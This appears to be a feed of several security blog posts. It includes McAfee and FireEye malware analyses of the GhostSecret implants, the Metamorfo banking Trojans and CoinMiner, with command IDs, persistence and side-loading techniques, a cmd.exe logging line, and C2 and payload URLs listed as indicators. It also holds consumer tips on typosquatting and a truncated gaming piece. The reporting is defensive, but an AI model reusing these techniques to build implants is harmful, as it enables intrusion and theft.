When we compared the PE rich header data of the new February 2018 implant with a variant of Backdoor.Escad (Destover) from 2014 shortly before the Sony Pictures attack, we found the signatures to be identical. The Destover-like variant is 83% similar in code to a 2015 variant and contains the same rich PE header signature as the Backdoor.Escad variant we analyzed. Thus the new implant is likely a derivative of components of Destover. We determined that the implant is not a direct copy of well-known previous samples of Destover; rather, Hidden Cobra created a new hybrid variant using functionality present in earlier versions.

2014 Backdoor.Escad (hash: 8a7621dba2e88e32c02fe0889d2796a0c7cb5144).

2015 Destover variant (7fe373376e0357624a1d21cd803ce62aa86738b6).

The February implant fe887fcab66d7d7f79f05e0266c0649f0114ba7c was obtained from an unknown submitter in the United States on February 14, two days after it was compiled. This Korean-language file used the control server IP address 203.131.222.83. The implant is nearly identical to an unknown 2017 sample (8f2918c721511536d8c72144eabaf685ddc21a35) except that the control server addresses are different. The 2017 sample used address 14.140.116.172. Both implants specifically use FakeTLS with PolarSSL, which we saw in previous Hidden Cobra implants. PolarSSL libraries have appeared in implants since the Sony Pictures incident and were used exclusively in the implant Backdoor.Destover. This implant incorporated a custom control server protocol that sends traffic over port 443. The implementation does not format the packets in standard SSL, but rather in a custom format and transmitted over SSL—hence, FakeTLS. The control server traffic when compared to Backdoor.Escad is nearly identical.

TLS traffic in Backdoor.Destover, the 2018 Destover-like variant.

TLS traffic in Backdoor.Escad.

Further research into IP address 14.140.116.172 leads us to additional hidden components involved in the overall infrastructure. Proxysvc.dll contains a list of hardcoded IP addresses, including the preceding address, all located in India. Despite the name, this component is not an SSL proxy, but rather a unique data-gathering and implant-installation component that listens on port 443 for inbound control server connections.

Proxysvc was first collected by public and private sources on March 22 from an unknown entity in the United States. The executable dropper for the component was submitted from South Korea on March 19. McAfee telemetry analysis from March 16 to 21 reveals that Proxysvc components were active in the wild. Our research shows this listener component appeared mostly in higher education organizations. We suspect this component is involved in core control server infrastructure. These targets were chosen intentionally to run Proxysvc because the attacker would have needed to know which systems were infected to connect to them. This data also indicates this infrastructure had been operating for more than a year before its discovery. The Advanced Threat Research team found this component running on systems in 11 countries. Given the limited capabilities of Proxysvc, it appears to be part of a covert network of SSL listeners that allow the attackers to gather data and install more complex implants or additional infrastructure. The SSL listener supports multiple control server connections, rather than a list of hardcoded addresses. By removing the dependency on hardcoded IP addresses and accepting only inbound connections, the control service can remain unknown.

The number of infected systems by country in which Proxysvc.dll was operating in March. Source: McAfee Advanced Threat Research.

The 2018 Destover-like implant appeared in organizations in 17 countries between March 14 and March 18. The impacted organizations are in industries such as telecommunications, health, finance, critical infrastructure, and entertainment.

The number of infected systems by country in which the Destover variant was operating in March. Source: McAfee Advanced Threat Research.

 

Control Servers

Further investigation into the control server infrastructure reveals the SSL certificate d0cb9b2d4809575e1bc1f4657e0eb56f307c7a76, which is tied to the control server 203.131.222.83, used by the February 2018 implant. This server resides at Thammasat University in Bangkok, Thailand. The same entity hosted the control server for the Sony Pictures implants. This SSL certificate has been used in Hidden Cobra operations since the Sony Pictures attack. Analyzing this certificate reveals additional control servers using the same PolarSSL certificate. Further analysis of McAfee telemetry data reveals several IP addresses that are active, two within the same network block as the 2018 Destover-like implant.

Number of infections by Thammasat Universityhosted control servers from March 1519, 2018. Source: McAfee Advanced Threat Research.

Implant Origins

McAfee Advanced Threat Research determined that the Destover-like variant originated from code developed in 2015. The code reappeared in variants surfacing in 2017 and 2018 using nearly the same functionality and with some modifications to commands, along with an identical development environment based on the rich PE header information.

Both implants (fe887fcab66d7d7f79f05e0266c0649f0114ba7c and 8f2918c721511536d8c72144eabaf685ddc21a35) are based on the 2015 code. When comparing the implant 7fe373376e0357624a1d21cd803ce62aa86738b6, compiled on August 8, 2015, we found it 83% similar to the implant from 2018. The key similarities and differences follow.

Similarities

  • Both variants build their API imports dynamically using GetProcAddress, including wtsapi32.dll for gathering user and domain names for any active remote sessions
  • Both variants contain a variety of functionalities based on command IDs issued by the control servers
  • Common capabilities of both malware:
    • Listing files in directory
    • Creating arbitrary processes
    • Writing data received from control servers to files on disk
    • Gathering information for all drives
    • Gathering process times for all processes
    • Sending the contents of a specific file to the control server
    • Wiping and deleting files on disk
    • Setting the current working directory for the implant
    • Sending disk space information to the control server
  • Both variants use a batch file mechanism to delete their binaries from the system
  • Both variants run commands on the system, log output to a temporary file, and send the contents of the file to their control servers

Differences

The following capabilities in the 2015 implant are missing from the 2018 variant:

  • Creating a process as a specific user
  • Terminating a specific process
  • Deleting a specific file
  • Setting file times for a specific file
  • Getting current system time and sending it to the control server
  • Reading the contents of a file on disk. If the filepath specified is a directory, then listing the directory’s contents.
  • Setting attributes on files

The 2015 implant does not contain a hardcoded value of the IP address it must connect to. Instead it contains a hardcoded sockaddr_in data structure (positioned at 0x270 bytes before the end of the binary) used by the connect() API to specify port 443 and control server IP addresses:

  • 193.248.247.59
  • 196.4.67.45

Both of these control servers used the PolarSSL certificate d0cb9b2d4809575e1bc1f4657e0eb56f307c7a76.

Proxysvc

At first glance Proxysvc, the SSL listener, looks like a proxy setup tool (to carry out man-in-the-middle traffic interception). However, a closer analysis of the sample reveals it is yet another implant using HTTP over SSL to receive commands from the control server.

Proxysvc appears to be a downloader whose primary capability is to deliver additional payloads to the endpoint without divulging the control address of the attackers. This implant contains a limited set of capabilities for reconnaissance and subsequent payload installations. This implant is a service DLL that can also run as a standalone process.

The ServiceMain() sub function of Proxysvc.

The implant cannot connect to a control server IP address or URL. Instead it accepts commands from the control server. The implant binds and listens to port 443 for any incoming connections. 

 

 

Proxysvc binding itself to the specified port.

Proxysvc begins accepting incoming requests to process. 

Proxysvc makes an interesting check while accepting connections from a potential control server. It checks against a list of IP addresses to make sure the incoming connection is not from any of the following addresses. If the incoming request does come from one of these, the implant offers a zero response (ASCII “0”) and shuts down the connection.

  • 121.240.155.74
  • 121.240.155.76
  • 121.240.155.77
  • 121.240.155.78
  • 223.30.98.169
  • 223.30.98.170
  • 14.140.116.172 

SSL Listener Capabilities

The implant receives HTTP-based commands from a control server and parses the HTTP Content-Type and Content-Length from the HTTP header. If the HTTP Content-Type matches the following value, then the implant executes the command specified by the control server:

Content-Type: 8U7y3Ju387mVp49A

HTTP Content-Type comparison with a custom implant value.

The implant has the following capabilities:

  • Writing an executable received from the control server into a temp file and executing it

Proxysvc writing a binary to a temp directory and executing it. 

  • Gathering system information and sending it to the control server. The system information gathered from the endpoint includes:
    • MAC address of the endpoint
    • Computer Name
    • Product name from HKLM\Software\Microsoft\Windows NT\CurrentVersion ProductName
    • This information is concatenated into a single string in the format: “MAC_Address|ComputerName|ProductName” and is sent to the control server
  • Recording HTTP requests from the control server to the temporary file prx in the implant’s install directory with the current system timestamp

Analyzing the Main Implant

The February 2018 implant contains a wide variety of capabilities including data exfiltration and arbitrary command execution on the victim’s system. Given the extensive command structure that the implant can receive from the control server, this is an extensive framework for data reconnaissance and exfiltration, and indicates advanced use. For example, the implant can wipe and delete files, execute additional implants, read data out of files, etc.

The implant begins execution by dynamically loading APIs to perform malicious activities. Libraries used to load the APIs include:

  • Kernel32.dll
  • Apvapi32.dll
  • Oleaut32.dll
  • Iphlpapi.dll
  • Ws2_32.dll
  • Wtsapi32.dll
  • Userenv.dll
  • Ntdll.dll

The main implant dynamically loading APIs.

As part of its initialization, the implant gathers basic system information and sends it to its hardcoded control server 203.131.222.83 using SSL over port 443:

  • Country name from system’s locale
  • Operating system version
  • Processor description from

HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ProcessorNameString

  • Computer name and network adapters information
  • Disk space information for disks C: through Z: including total memory in bytes, total available memory in bytes, etc.
  • Current memory status including total physical memory in bytes, total available memory, etc.
  • Domain name and usernames based on current remote sessions

Domain name and username extraction using Win32 WTS APIs.

Data Reconnaissance

The implant receives commands over SSL as encoded data. This data is decoded, and the correct command ID is derived. Valid command IDs reside between 0 and 0x1D.

Switch case handling command execution based on command IDs.

Based on the command ID, the implant can perform the following functions:

  • Gather system information and exfiltrate to the control server (same as the basic data-gathering functionality previously described)
  • Get volume information for all drives on the system (A: through Z:) and exfiltrate to the control server

Gathering volume information.

  • List files in a directory. The directory path is specified by the control server.
  • Read the contents of a file and send it to the control server

Reading file contents and sending it the control server.

  • Write data sent by the control server to a specified file path

Open handle to a file for writing with no shared permissions.

Writing data received from control server to file.

  • Create new processes based on the file path specified by the control server.

Creating a new process for a binary specified by the control server.

  • Wipe and delete files specified by the control server

Wiping and deleting files.

  • Execute a binary on the system using cmd.exe and log the results into a temp file, which is then read and the logged results are sent to the control server. The command line:

cmd.exe /c “<file_path> > %temp%\PM*.tmp 2>&1”

Executing a command and logging results to a temp file.

  • Get information for all currently running processes

Getting process times for all processes on the system.

Getting username and domain from accounts associated with a running process.

  • Delete itself from disk using a batch file.

Creating a batch file for self-deletion.

  • Store encoded data received from the control server as a registry value at:

HKLM\Software\Microsoft\Windows\CurrentVersion\TowConfigs Description

  • Set and get the current working directory for the implant

Setting and getting the current working directory for the implant’s process.

The command handler index table is organized in the implant as follows:

The command handler index table.

Conclusion

This analysis by the McAfee Advanced Threat Research team has found previously undiscovered components that we attribute to Hidden Cobra, which continues to target organizations around the world. The evolution in complexity of these data-gathering implants reveals an advanced capability by an attacker that continues its development of tools. Our investigation uncovered an unknown infrastructure connected to recent operations with servers in India using an advanced implant to establish a covert network to gather data and launch further attacks.

The McAfee Advanced Threat Research team will provide further updates as our investigation develops.

Fighting cybercrime is a global effort best undertaken through effective partnerships between the public and private sectors. McAfee is working with Thai government authorities to take down the control server infrastructure of Operation GhostSecret, while preserving the systems involved for further analysis by law enforcement authorities. By creating and maintaining partnerships with worldwide law enforcement, McAfee demonstrates that we are stronger together.  

Indicators of Compromise

McAfee detection

  • Trojan-Bankshot2

MITRE ATT&CK techniques

  • Exfiltration over control server channel: data is exfiltrated over the control server channel using a custom protocol
  • Commonly used port: the attackers used common ports such as port 443 for control server communications
  • Service execution: registers the implant as a service on the victim’s machine
  • Automated collection: the implant automatically collects data about the victim and sends it to the control server
  • Data from local system: local system is discovered and data is gathered
  • Process discovery: implants can list processes running on the system
  • System time discovery: part of the data reconnaissance method, the system time is also sent to the control server
  • File deletion: malware can wipe files indicated by the attacker

IP addresses

  • 203.131.222.83
  • 14.140.116.172
  • 203.131.222.109

Hashes

  • fe887fcab66d7d7f79f05e0266c0649f0114ba7c
  • 8f2918c721511536d8c72144eabaf685ddc21a35
  • 33ffbc8d6850794fa3b7bccb7b1aa1289e6eaa45 

The post Analyzing Operation GhostSecret: Attack Seeks to Steal Data Worldwide appeared first on McAfee Blogs.

Metamorfo Campaigns Targeting Brazilian Users

FireEye Labs recently identified several widespread malspam (malware spam) campaigns targeting Brazilian companies with the goal of delivering banking Trojans. We are referring to these campaigns as Metamorfo. Across the stages of these campaigns, we have observed the use of several tactics and techniques to evade detection and deliver the malicious payload. In this blog post we dissect two of the main campaigns and explain how they work.

Campaign #1

The kill chain starts with an email containing an HTML attachment with a refresh tag that uses a Google URL shortener as the target. Figure 1 shows a sample email, and Figure 2 show the contents of the HTML file.


Figure 1: Malicious Email with HTML Attachment


Figure 2: Contents of HTML File

When the URL is loaded, it redirects the victim to a cloud storage site such as GitHub, Dropbox, or Google Drive to download a ZIP file. An example is shown in Figure 3.


Figure 3: URL Shortener Redirects to Github Link

The ZIP archive contains a malicious portable executable (PE) file with embedded HTML application (HTA). The user has to unzip the archive and double-click the executable for the infection chain to continue. The PE file is a simple HTA script compiled into an executable. When the user double-clicks the executable, the malicious HTA file is extracted to %temp% and executed by mshta.exe.

The HTA script (Figure 4) contains VBS code that fetches a second blob of VBS code encoded in base64 form from hxxp://<redacted>/ilha/pz/logs.php. 


Figure 4: Contents of HTA File

After the second stage of VBS is decoded (Figure 5 and Figure 6), the script downloads the final stage from hxxp://<redacted>/28022018/pz.zip. 


Figure 5: Contents of Decoded VBS


Figure 6: More Contents of Decoded VBS

The downloaded ZIP file contains four files. Two are PE files. One is a legitimate Windows tool, pvk2pfx.exe, that is abused for DLL side-loading. One is the malicious banking Trojan as the DLL.

The VBS code unzips the archive, changes the extension of the legitimate Windows tool from .png to .exe, and renames the malicious DLL as cryptui.dll. The VBS code also creates a file in C:\Users\Public\Administrador\car.dat with random strings. These random strings are used to name the Windows tool, which is then executed. Since this tool depends on a legitimate DLL named cryptui.dll, the search order path will find the malicious Trojan with the same name in the same directory and load it into its process space.

In Q4 of 2017, a similar malspam campaign delivered the same banking Trojan by using an embedded JAR file attached in the email instead of an HTML attachment. On execution, the Java code downloaded a ZIP archive from a cloud file hosting site such as Google Drive, Dropbox, or Github. The ZIP archive contained a legitimate Microsoft tool and the malicious Trojan.

Banking Trojan Analysis

The Trojan expects to be located in the hardcoded directory C:\\Users\\Public\Administrador\\ along with three other files to start execution. As seen in Figure 7, these files are:

  • car.dat (randomly generated name given to Windows tool)
  • i4.dt (VBS script that downloads the same zip file)
  • id (ID given to host)
  • cryptui.dll (malicious Trojan)


Figure 7: Contents of ZIP Archive

Persistence

The string found in the file C:\\Users\\Public\\Administrador\\car.dat is extracted and used to add the registry key Software\Microsoft\Windows\CurrentVersion\Run\<string from car.dat> for persistence, as shown in Figure 8.


Figure 8: Reading from car.dat File

The sample also looks for a file named i4.dt in the same directory and extracts the contents of it, renames the file to icone.vbs, and creates a new persistent key (Figure 9) in \Software\Microsoft\Windows\CurrentVersion\Run to open this file.


Figure 9: Persistence Keys

The VBS code in this file (Figure 10) has the ability to recreate the whole chain and download the same ZIP archive.


Figure 10: Contents of VBS Script

Next, the Trojan searches for several folders in the Program Files directories, including:

  • C:\\Program Files\\AVG
  • C:\\Program Files\\AVAST Software
  • C:\\Program Files\\Diebold\\Warsaw
  • C:\\Program Files\\Trusteer\\Rapport
  • C:\\Program Files\\Java
  • C:\\Program Files (x86)\\scpbrad

If any of the folders are found, this information, along with the hostname and Operating System version, is sent to a hardcoded domain with the hardcoded User-Agent value “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0” in the format shown in Figure 11. The value of AT is “<host_name+OS&MD>=<list of folders found>”.


Figure 11: Network Traffic for Host Enumeration

The sample iterates through the running processes, kills the following, and prevents them from launching:

  • msconfig.exe
  • TASKMGR.exe
  • regedit.exe
  • ccleaner64.exe
  • taskmgr.exe
  • itauaplicativo.exe

Next, it uses GetForegroundWindow to get a handle to the window the user is viewing and GetWindowText to extract the title of the window. The title is compared against a hardcoded list of Brazilian banking and digital coin sites. The list is extensive and includes major organizations and smaller entities alike. 

If any of those names are found and the browser is one of the following, the Trojan will terminate that browser.

  • firefox.exe
  • chrome.exe
  • opera.exe
  • safari.exe

The folder C:\Users\Public\Administrador\logs\ is created to store screenshots, as well as the number of mouse clicks the user has triggered while browsing the banking sites (Figure 12). The screenshots are continuously saved as .jpg images.


Figure 12: Malware Capturing Mouse Clicks

Command and Control

The command and control (C2) server is selected based on the string in the file “id”:

  • al -> '185.43.209[.]182'
  • gr -> '212.237.46[.]6'
  • pz -> '87.98.146[.]34'
  • mn -> ’80.211.140[.]235'

The connection to one of the hosts is then started over raw TCP on port 9999. The command and control communication generally follows the pattern <|Command |>, for example:

  • '<|dispida|>logs>SAVE<' sends the screenshots collected in gh.txt.
  • '<PING>' is sent from C2 to host, and '<PONG>' is sent from host to C2, to keep the connection alive.
  • '<|INFO|>' retrieves when the infection first started based on the file timestamp from car.dat along with '<|>' and the host information.

There were only four possible IP addresses that the sample analyzed could connect to based on the strings found in the file “id”. After further researching the associated infrastructure of the C2 (Figure 13), we were able to find potential number of victims for this particular campaign.

 

Figure 13: Command and Control Server Open Directories

Inside the open directories, we were able to get the following directories corresponding to the different active campaigns. Inside each directory we could find statistics with the number of victims reporting to the C2. As of 3/27/2018, the numbers were:

  • al – 843
  • ap – 879
  • gr – 397
  • kk – 2,153
  • mn – 296
  • pz – 536
  • tm – 187

A diagram summarizing Campaign #1 is shown in Figure 14.


Figure 14: Infection Chain of Campaign #1

Campaign #2

In the second campaign, FireEye Labs observed emails with links to legitimate domains (such as hxxps://s3-ap-northeast-1.amazonaws[.]com/<redacted>/Boleto_Protesto_Mes_Marco_2018.html) or compromised domains (such as hxxps://curetusu.<redacted>-industria[.]site/) that use a refresh tag with a URL shortener as the target. The URL shortener redirects the user to an online storage site, such as Google Drive, Github, or Dropbox, that hosts a malicious ZIP file. A sample phishing email is shown in Figure 15.


Figure 15: Example Phishing Email

The ZIP file contains a malicious executable written in AutoIt (contents of this executable are shown in Figur 16). When executed by the user, it drops a VBS file to a randomly created and named directory (such as C:\mYPdr\TkCJLQPX\HwoC\mYPdr.vbs) and fetches contents from the C2 server.


Figure 16: Contents of Malicious AutoIt Executable

Two files are downloaded from the C2 server. One is a legitimate Microsoft tool and the other is a malicious DLL: 

  • https[:]//panel-dark[.]com/w3af/img2.jpg
  • https[:]//panel-dark[.]com/w3af/img1.jpg

Those files are downloaded and saved into random directories named with the following patterns:

  • <current user dir>\<5 random chars>\<8 random chars>\<4 random chars>\<5 random chars>.exe
  • <current user dir>\<5 random chars>\<8 random chars>\<4 random chars>\CRYPTUI.dll 

The execution chain ensures that persistence is set on the affected system using a .lnk file in the Startup directory. The .lnk file shown in Figure 17 opens the malicious VBS dropped on the system.


Figure 17: Persistence Key

The VBS file (Figure 18) will launch and execute the downloaded legitimate Windows tool, which in this case is Certmgr.exe. This tool will be abused using the DLL side loading technique. The malicious Cryptui.dll is loaded into the program instead of the legitimate one and executed.


Figure 18: Contents of Dropped VBS File

Banking Trojan Analysis

Like the Trojan from the first campaign, this sample is executed through search-order hijacking. In this case, the binary abused is a legitimate Windows tool, Certmgr.exe, that loads Cryptui.dll. Since this tool depends on a legitimate DLL named cryptui.dll, the search order path will find the malicious Trojan with the same name in the same directory and load it into its process space.

The malicious DLL exports 21 functions. Only DllEntryPoint contains real code that is necessary to start the execution of the malicious code. The other functions return hardcoded values that serve no real purpose.

On execution, the Trojan creates a mutex called "correria24" to allow only one instance of it to run at a time.

The malware attempts to resolve “www.goole[.]com” (most likely a misspelling). If successful, it sends a request to hxxp://api-api[.]com/json in order to detect the external IP of the victim. The result is parsed and execution continues only if the country code matches “BR”, as shown in Figure 19.


Figure 19: Country Code Check

The malware creates an empty file in %appdata%\Mariapeirura on first execution, which serves as a mutex lock, before attempting to send any collected information to the C2 server. This is done in order to get only one report per infected host.

The malware collects host information, base64 encodes it, and sends it to two C2 servers. The following items are gathered from the infected system:

  • OS name
  • OS version
  • OS architecture
  • AV installed
  • List of banking software installed
  • IP address
  • Directory where malware is being executed from

The information is sent to hxxp://108.61.188.171/put.php (Figure 20).


Figure 20: Host Recon Data Sent to First C2 Server

The same information is sent to panel-dark[.]com/Contador/put.php (Figure 21).


Figure 21: Host Recon Data Sent to Second C2 Server

The malware alters the value of registry key Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ExtendedUIHoverTime to 2710 in order to change the number of milliseconds a thumbnail is showed while hovering on the taskbar, as seen in Figure 22.


Figure 22: ExtendedUIHoverTime Registry Key Change

Like the Trojan from the first campaign, this sample checks if the foreground window's title contains names of Brazilian banks and digital coins by looking for hardcoded strings.

The malware displays fake forms on top of the banking sites and intercepts credentials from the victims. It can also display a fake Windows Update whenever there is nefarious activity in the background, as seen in Figure 23.


Figure 23: Fake Form Displaying Windows Update

The sample also contains a keylogger functionality, as shown in Figure 24.


Figure 24: Keylogger Function

Command and Control

The Trojan’s command and control command structure is identical to the first sample. The commands are denoted by the <|Command|> syntax.

  • <|OK|> gets a list of banking software installed on the host.
  • '<PING>' is sent from C2 to host, and '<PONG>' is sent from host to C2, to keep connection alive.
  • <|dellLemb|> deletes the registry key \Software\Microsoft\Internet Explorer\notes.
  • EXECPROGAM calls ShellExecute to run the application given in the command.
  • EXITEWINDOWS calls ExitWindowsEx.
  • NOVOLEMBRETE creates and stores data sent with the command in the registry key \Software\Microsoft\Internet Explorer\notes.


Figure 25: Partial List of Victims

This sample contains most of the important strings encrypted. We provide the following script (Figure 26) in order to decrypt them.


Figure 26: String Decryption Script

Conclusion

The use of multi-stage infection chains makes it challenging to research these types of campaigns all the way through.

As demonstrated by our research, the attackers are using various techniques to evade detection and infect unsuspecting Portuguese-speaking users with banking Trojans. The use of public cloud infrastructure to help deliver the different stages plays a particularly big role in delivering the malicious payload. The use of different infection methods combined with the abuse of legitimate signed binaries to load malicious code makes these campaigns worth highlighting.

Indicators of Compromise

Campaign #1
TYPE HASH DESCRIPTION
MD5 860fa744d8c82859b41e00761c6e25f3 PE with Embedded HTA
MD5 3e9622d1a6d7b924cefe7d3458070d98 PE with Embedded HTA
MD5 f402a482fd96b0a583be2a265acd5e74 PE with Embedded HTA
MD5 f329107f795654bfc62374f8930d1e12 PE with Embedded HTA
MD5 789a021c051651dbc9e01c5d8c0ce129 PE with Embedded HTA
MD5 68f818fa156d45889f36aeca5dc75a81 PE with Embedded HTA
MD5 c2cc04be25f227b13bcb0b1d9811e2fe cryptui.dll
MD5 6d2cb9e726c9fac0fb36afc377be3aec id
MD5 dd73f749d40146b6c0d2759ba78b1764 i4.dt
MD5 d9d1e72165601012b9d959bd250997b3 VBS file with commands to create staging directories for malware
MD5 03e4f8327fbb6844e78fda7cdae2e8ad pvk2pfx.exe [Legit Windows Tool]
URL   hxxp://5.83.162.24/ilha/pz/logs.php
URL   hxxp://5.83.162.24/28022018/pz.zip 
C2   ibamanetibamagovbr[.]org/virada/pz/logs.php
URL   sistemasagriculturagov[.]org
URL   hxxp://187.84.229.107/05022018/al.zip
Campaign #2
TYPE HASH DESCRIPTION
MD5 2999724b1aa19b8238d4217565e31c8e AutoIT Dropper
MD5 181c8f19f974ad8a84b8673d487bbf0d img1.jpg [lLegit Windows Tool]
MD5 d3f845c84a2bd8e3589a6fbf395fea06 img2.jpg [Banking Trojan]
MD5 2365fb50eeb6c4476218507008d9a00b Variants of Banking Trojan
MD5 d726b53461a4ec858925ed31cef15f1e Variants of Banking Trojan
MD5 a8b2b6e63daf4ca3e065d1751cac723b Variants of Banking Trojan
MD5 d9682356e78c3ebca4d001de760848b0 Variants of Banking Trojan
MD5 330721de2a76eed2b461f24bab7b7160 Variants of Banking Trojan
MD5 6734245beda04dcf5af3793c5d547923 Variants of Banking Trojan
MD5 a920b668079b2c1b502fdaee2dd2358f Variants of Banking Trojan
MD5 fe09217cc4119dedbe85d22ad23955a1 Variants of Banking Trojan
MD5 82e2c6b0b116855816497667553bdf11 Variants of Banking Trojan
MD5 4610cdd9d737ecfa1067ac30022d793b Variants of Banking Trojan
MD5 34a8dda75aea25d92cd66da53a718589 Variants of Banking Trojan
MD5 88b808d8164e709df2ca99f73ead2e16 Variants of Banking Trojan
MD5 d3f845c84a2bd8e3589a6fbf395fea06 Variants of Banking Trojan
MD5 28a0968163b6e6857471305aee5c17e9 Variants of Banking Trojan
MD5 1285205ae5dd5fa5544b3855b11b989d Variants of Banking Trojan
MD5 613563d7863b4f9f66590064b88164c8 Variants of Banking Trojan
MD5 3dd43e69f8d71fcc2704eb73c1ea7daf Variants of Banking Trojan
C2   https[:]//panel-dark[.]com/w3af/img2.jpg 
C2   https[:]//panel-dark[.]com/w3af/img1.jpg 

Typosquatting: What You Need to Know Now

As it turns out, your high school English teacher was right—spelling does matter. This is especially true now, when mistyping a simple web address could potentially land you in hot water. Although “typosquatting” has been around for a long time, cybercriminals are becoming more systematic in how they use this technique, aiming to steal personal information, make money, or spread malware.

If you’ve ever typed in a web address and landed on a page that is nothing like the one you intended to go to, you may be familiar with this practice, also known as “URL hijacking.” This is when a webpage is put up at a similar web address to another well-known site, in the hopes of capturing some of the legitimate website’s traffic.

These sites often rely on the small typos we make when we type in web addresses, like accidentally omitting the “o” in “.com”. In fact, researchers recently found a whole host of addresses that were registered in the names of well-known sites, but terminating in  “.cm”, instead of “.com”. These copycat addresses included financial websites, such as Chase.cm and Citicards.cm, as well as social and streaming sites.

The .cm sites were used to advertise promotions and surveys used to collect users’ personal information. What’s more, over 1,500 of them were registered to the same email address, indicating that someone was trying to turn typosquatting into a serious business.

While early typosquatting efforts were often aimed at stealing traffic alone, we’re now seeing a move toward clever copycats. Some look like real banking websites, complete with stolen logos and familiar login screens, hoping to trick you into entering your passwords and others sensitive information.

Earlier this year, for instance, the Reserve Bank of India (RBI) warned customers that someone had bought the URL “www.indiareserveban.org”, and put up a fake site, asking for banking details and passwords, even though the real RBI is a central bank that holds no individual accounts.

But, cybercrooks don’t even need to put up fake websites to try to steal your information; they can also trick you into downloading malware. They may lead you to a site that delivers a pop-up screen telling you to update your Adobe Flash Player, for instance.

That’s exactly what happened not too long ago to Netflix users who accidentally typed in “Netflix.om”, instead of “.com”. The cybercrooks had smartly used the Netflix address ending in the top-level domain for Oman to try to redirect at least some of the streaming site’s over 118 million users to a malware-laden site instead. In fact, “.om” was used as part of a larger typosquatting campaign, targeting over 300 well-known organizations.

Given that typos are easy to do, and fake websites are becoming more convincing, here are the steps you should take to protect yourself from typosquatting:

  • Whether you type in a web address to the address field, or a search engine, be careful that you spell the address correctly before you hit “return”.
  • If you are going to a website where you might share private information, look for the green lock symbol in the upper left-hand corner of the address bar, indicating that the site uses encryption to secure the data that you share.
  • Be suspicious of websites with low-quality graphics or misspellings, since these are telltale signs of fake websites.
  • Consider bookmarking sites you visit regularly to make sure you get to the right site, each time.
  • Don’t click on links in emails, text messages and popup messages unless you know and trust the sender.
  • Consider using a safe search tool such as McAfee WebAdvisor, which can alert you to risky websites right in your search results.
  • Always use comprehensive security software on both your computers and devices to protect you from malware and other online threats.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post Typosquatting: What You Need to Know Now appeared first on McAfee Blogs.

Parasitic Coin Mining Creates Wealth, Destroys Systems

The increasing popularity of cryptocurrencies has inspired some people to pursue coin mining, essentially making money online. (Mining is the processing of transactions in the digital currency system, in which new transactions are recorded in a digital ledger called the blockchain. Miners help to update the ledger to verify and collect new transactions to be added to the blockchain. In return, miners earn Bitcoins, for example.) Mining is resource intensive and legal if it is done with the proper permissions.

McAfee Labs has recently seen a huge increase in a malware variant, commonly known as CoinMiner or CoinMiner-FOZU!, which takes control of a victim’s computer to mine new coins by infecting user executables, injecting Coinhive JavaScript into HTML files, and blocking the domains of security products to stop signature updates.

CoinMiner-FOZU!, which we analyzed, has led all major coin-miner malware in prevalence in 2018. (March figures are incomplete.) Source: McAfee Labs.

The following graphs show statistics and geographic data for recent CoinMiner-FOZU! detections:

W32/CoinMiner employs—without a user’s consent—machine resources to mine coins for virtual currencies. Its parasitic nature makes it rare as well as destructive: The malware does not put a unique marker on each file it infects. Thus subsequent infections by the same malware will reinfect the victim’s files.

Analysis

After launching, CoinMiner copies itself into two hardcoded locations:

  • %Windows%\360\360Safe\deepscan\ZhuDongFangYu.exe
  • %filesystemroot%:\RECYCLER\S-5-4-62-7581032776-5377505530-562822366-6588\ZhuDongFangYu.exe

These two files are hidden and read only:

The binary executes from the first location and starts the parasitic infection process. The malware prepends itself to user-executable files but, unlike traditional file infectors, it does not allow the original file to run. It targets files with extensions .exe, .com, .scr, and .pif. This malware does not check for multiple infections. If the threat is deleted and later reinfects the system, the same files will again be targeted.

To prevent victims from restoring clean copies of their files, the malware deletes both ISO (disk image) and GHO (Norton Ghost) files:

 

Once CoinMiner finishes infecting other executable files, it injects a Coinhive script into HTML files. The Coinhive service provides cryptocurrency mining software, which using JavaScript code can be embedded in websites and use the site visitor’s processing power to mine the cryptocurrency:

CoinMiner disables the user account control feature, which notifies the user when applications make changes to the system. Through registry updates, it also disables folder options and registry tools, and deletes safe mode.

From its second location on an infected system—the hidden autorun.inf at the file system root—the malware ensures that it starts after rebooting:

To avoid detection by security products, CoinMiner puts security software domains in the hosts file and redirects them to 127.0.0.1, the loopback address on the victim’s system. If users have not created a local website, they will see an error page in their browsers. By doing this, the malware ensures that no victim can receive an update from the security vendor.

When the victim runs the script-injected HTML files, the Coinhive script executes, downloading coinhive.min.js (hash: 4d6af0dba75bedf4d8822a776a331b2b1591477c6df18698ad5b8628e0880382) from coinhive.com. This script takes over 100% of the CPU for mining using the function setThrottle(0). The mining stops when the victim closes the infected HTML file:

The simple hosts-file injection, hiding in the recycle bin, and maximizing CPU usage suggest that this malware has been written by a novice author. McAfee advises all users to keep their antimalware products up to date.

McAfee Detections

  • W32/CoinMiner
  • CoinMiner-FOZU![Partial hash]
  • TXT/CoinMiner.m
  • HTML/CoinMiner.m
  • JS/Miner.c

Hashes (SHA-256)

  • 80568db643de5f429e9ad5e2005529bc01c4d7da06751e343c05fa51f537560d
  • bb987f37666b6e8ebf43e443fc4bacd5f0ab795194f20c01fcd10cb582da1c57
  • 4d6af0dba75bedf4d8822a776a331b2b1591477c6df18698ad5b8628e0880382

The post Parasitic Coin Mining Creates Wealth, Destroys Systems appeared first on McAfee Blogs.

Teen Gaming, Cybersecurity Specialist Training

Many of us parents have a love/hate relationship with teen gaming. While it seems to cast a spell over many kids and lure them into a trance, gaming does provide some quite welcome ‘time-out’ for all family members! But I can honestly say that in my household, disputes over allocated ‘Xbox’ time would be by far the most common variety. And they can drive me insane!!

Now new research from McAfee may just get me rethinking my often negative attitude to gaming. The Winning The Game report investigates the key challenges facing the IT Security industry in the ongoing fight against cyber threats. Just under 1000 cybersecurity managers across the US, UK, Germany, Singapore, Australia and Japan took part in the research which found that gamers may play a very big role in keeping cybercriminals at bay!

Click to view Winning the Game report

The Cybersecurity Skills Shortage

Worldwide the cybersecurity industry currently has a zero-percent unemployment rate. Many experts predict that this will remain the case until at least 2021. While this is great if you are job hunting, it isn’t great news for Government departments, corporations and businesses. The increasing number of cyberattacks means these organisations are struggling to find cybersecurity professionals to help deal with these threats. Which is ultimately putting a lot of us at risk.

